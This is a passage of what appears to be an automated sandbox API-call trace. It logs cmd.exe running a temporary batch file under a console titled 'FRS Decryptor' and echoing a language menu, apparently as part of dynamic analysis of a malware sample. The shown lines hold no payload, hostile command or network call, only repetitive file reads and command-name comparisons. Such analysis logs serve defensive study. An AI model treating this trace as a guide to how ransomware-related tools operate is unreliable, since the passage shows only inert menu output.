"c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.956] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.956] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.956] SetFilePointer (in: hFile=0xa0, lDistanceToMove=609, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x261 [0068.956] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x261 [0068.956] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1b94, lpOverlapped=0x0) returned 1 [0068.956] SetFilePointer (in: hFile=0xa0, lDistanceToMove=616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x268 [0068.956] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=7, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo.\r\n [1] ╓╨╬─\r\n╘: Select your language: \r\n____________________________________________________\r\n") returned 7 [0068.956] GetFileType (hFile=0xa0) returned 0x1 [0068.956] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.956] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x268 [0068.956] _tell (_FileHandle=3) returned 616 [0068.956] _close (_FileHandle=3) returned 0 [0068.956] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.956] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.956] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.956] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.956] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.956] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.956] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.956] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.956] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.956] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.956] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.956] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.956] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.956] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.956] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.956] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.956] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.956] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.956] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.956] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.957] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.957] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.957] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.957] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.957] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.957] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.957] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.957] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.957] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.957] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.957] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.957] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.957] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.957] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.957] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.957] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.957] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.957] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.957] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.957] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.957] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.957] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.957] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.957] SetErrorMode (uMode=0x0) returned 0x0 [0068.957] SetErrorMode (uMode=0x1) returned 0x0 [0068.957] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.957] SetErrorMode (uMode=0x0) returned 0x1 [0068.957] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.957] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.957] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.957] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.957] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.957] GetLastError () returned 0x2 [0068.957] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.957] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.959] GetLastError () returned 0x2 [0068.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.959] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.959] GetLastError () returned 0x2 [0068.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.959] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.959] GetLastError () returned 0x2 [0068.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.959] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.960] GetLastError () returned 0x2 [0068.960] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.960] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.960] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.960] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.960] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.960] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.960] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.960] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.960] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.960] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.960] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.960] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.960] GetFileType (hFile=0xc) returned 0x2 [0068.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.961] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.961] _get_osfhandle (_FileHandle=1) returned 0xc [0068.961] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x2) returned 1 [0068.961] _get_osfhandle (_FileHandle=1) returned 0xc [0068.961] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.961] _get_osfhandle (_FileHandle=1) returned 0xc [0068.961] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.962] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.962] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.962] SetConsoleInputExeNameW () returned 0x1 [0068.962] GetConsoleOutputCP () returned 0x1b5 [0068.962] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.962] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.962] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.962] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.962] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.963] SetFilePointer (in: hFile=0xa0, lDistanceToMove=616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x268 [0068.963] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x268 [0068.963] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1b8d, lpOverlapped=0x0) returned 1 [0068.963] SetFilePointer (in: hFile=0xa0, lDistanceToMove=639, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x27f [0068.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=23, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo. [2] English\r\n Select your language: \r\n____________________________________________________\r\n") returned 23 [0068.963] GetFileType (hFile=0xa0) returned 0x1 [0068.963] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.963] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x27f [0068.963] _tell (_FileHandle=3) returned 639 [0068.963] _close (_FileHandle=3) returned 0 [0068.963] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.963] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.963] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.963] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.963] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.963] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.963] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.963] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.963] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.963] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.963] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.963] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.963] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.963] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.963] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.963] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.963] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.963] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.963] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.963] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.963] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.963] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.963] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.963] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.963] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.963] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.963] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.963] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.963] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.963] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.963] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.963] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.964] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.964] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.964] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.964] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.964] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.964] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.964] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.964] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.964] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.964] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.964] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.964] SetErrorMode (uMode=0x0) returned 0x0 [0068.964] SetErrorMode (uMode=0x1) returned 0x0 [0068.964] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.964] SetErrorMode (uMode=0x0) returned 0x1 [0068.964] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.964] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.964] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.964] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.964] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.964] GetLastError () returned 0x2 [0068.964] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.964] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.964] GetLastError () returned 0x2 [0068.964] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.964] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.965] GetLastError () returned 0x2 [0068.965] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.965] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.965] GetLastError () returned 0x2 [0068.965] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.965] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.966] GetLastError () returned 0x2 [0068.966] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.966] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.966] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.966] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.966] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.966] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.966] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.966] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.966] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.966] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.966] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.966] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.966] GetFileType (hFile=0xc) returned 0x2 [0068.966] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.966] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.966] _get_osfhandle (_FileHandle=1) returned 0xc [0068.967] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x12, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x12) returned 1 [0068.967] _get_osfhandle (_FileHandle=1) returned 0xc [0068.967] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.967] _get_osfhandle (_FileHandle=1) returned 0xc [0068.967] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.967] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.967] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.968] SetConsoleInputExeNameW () returned 0x1 [0068.968] GetConsoleOutputCP () returned 0x1b5 [0068.968] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.968] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.968] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.968] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.968] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.968] SetFilePointer (in: hFile=0xa0, lDistanceToMove=639, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x27f [0068.968] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x27f [0068.968] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1b76, lpOverlapped=0x0) returned 1 [0068.968] SetFilePointer (in: hFile=0xa0, lDistanceToMove=646, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x286 [0068.968] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=7, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo.\r\n [2] English\r\n Select your language: \r\n____________________________________________________\r\n") returned 7 [0068.968] GetFileType (hFile=0xa0) returned 0x1 [0068.968] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.969] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x286 [0068.969] _tell (_FileHandle=3) returned 646 [0068.969] _close (_FileHandle=3) returned 0 [0068.969] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.969] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.969] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.969] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.969] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.969] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.969] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.969] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.969] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.969] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.969] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.969] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.969] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.969] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.969] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.969] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.969] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.969] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.969] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.969] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.969] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.969] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.969] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.969] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.969] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.969] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.969] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.969] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.969] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.969] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.969] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.969] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.969] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.969] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.969] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.969] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.969] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.969] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.969] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.969] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.969] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.969] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.969] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.969] SetErrorMode (uMode=0x0) returned 0x0 [0068.969] SetErrorMode (uMode=0x1) returned 0x0 [0068.970] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.970] SetErrorMode (uMode=0x0) returned 0x1 [0068.970] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.970] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.970] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.970] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.970] GetLastError () returned 0x2 [0068.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.970] GetLastError () returned 0x2 [0068.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.970] GetLastError () returned 0x2 [0068.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.970] GetLastError () returned 0x2 [0068.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.971] GetLastError () returned 0x2 [0068.971] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.972] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.972] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.972] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.972] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.972] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 